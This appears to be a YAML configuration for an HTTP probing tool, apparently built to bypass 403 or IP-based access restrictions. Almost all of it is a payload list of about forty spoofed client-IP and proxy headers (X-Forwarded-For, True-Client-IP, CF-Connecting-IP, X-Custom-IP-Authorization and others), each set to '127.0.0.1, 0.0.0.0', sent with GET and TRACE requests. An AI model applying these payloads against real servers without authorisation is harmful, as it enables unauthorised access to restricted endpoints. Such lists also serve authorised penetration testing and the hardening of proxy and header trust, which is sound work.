probe:
  client:
    redirect: false
    timeout: 5
  protocol:
    - https
    - http
  method:
    - GET
    - TRACE
bypass:
  - name: headers
    payloads:
    - header: X-Originally-Forwarded-For
      value: 127.0.0.1, 0.0.0.0
    - header: X-Originating-IP
      value: 127.0.0.1, 0.0.0.0
    - header: True-Client-IP
      value: 127.0.0.1, 0.0.0.0
    - header: X-WAP-Profile
      value: 127.0.0.1, 0.0.0.0
    - header: X-WAP-Profile
      value: 127.0.0.1, 0.0.0.0
    - header: Destination
      value: 127.0.0.1, 0.0.0.0
    - header: Proxy
      value: 127.0.0.1, 0.0.0.0
    - header: CF-Connecting_IP
      value: 127.0.0.1, 0.0.0.0
    - header: CF-Connecting-IP
      value: 127.0.0.1, 0.0.0.0
    - header: X-Custom-IP-Authorization
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarded-For
      value: 127.0.0.1, 0.0.0.0
    - header: X-Remote-IP
      value: 127.0.0.1, 0.0.0.0
    - header: X-Client-IP
      value: 127.0.0.1, 0.0.0.0
    - header: X-Host
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarded-Host
      value: 127.0.0.1, 0.0.0.0
    - header: Content-Length
      value: 0
    - header: X-ProxyUser-Ip
      value: 127.0.0.1, 0.0.0.0
    - header: Base-Url
      value: 127.0.0.1, 0.0.0.0
    - header: Client-IP
      value: 127.0.0.1, 0.0.0.0
    - header: Http-Url
      value: 127.0.0.1, 0.0.0.0
    - header: Proxy-Host
      value: 127.0.0.1, 0.0.0.0
    - header: Proxy-Url
      value: 127.0.0.1, 0.0.0.0
    - header: Real-Ip
      value: 127.0.0.1, 0.0.0.0
    - header: Redirect
      value: 127.0.0.1, 0.0.0.0
    - header: Referrer
      value: 127.0.0.1, 0.0.0.0
    - header: Request-Uri
      value: 127.0.0.1, 0.0.0.0
    - header: Uri
      value: 127.0.0.1, 0.0.0.0
    - header: Url
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forward-For
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarded-By
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarded-For-Original
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarded-Server
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarded
      value: 127.0.0.1, 0.0.0.0
    - header: X-Forwarder-For
      value: 127.0.0.1, 0.0.0.0
    - header: X-Http-Destinationurl
      value: 127.0.0.1, 0.0.0.0
    - header: X-Http-Host-Override
      value: 127.0.0.1, 0.0.0.0
    - header: X-Original-Remote-Addr
      value: 127.0.0.1, 0.0.0.0
    - header: X-Proxy-Url
      value: 127.0.0.1, 0.0.0.0
    - header: X-Real-Ip
      value: 127.0.0.1, 0.0.0.0
    - header: X-Remote-Addr
      value: 127.0.0.1, 0.0.0.0
    - header: X-OReferrer
      value: 127.0.0.1, 0.0.0.0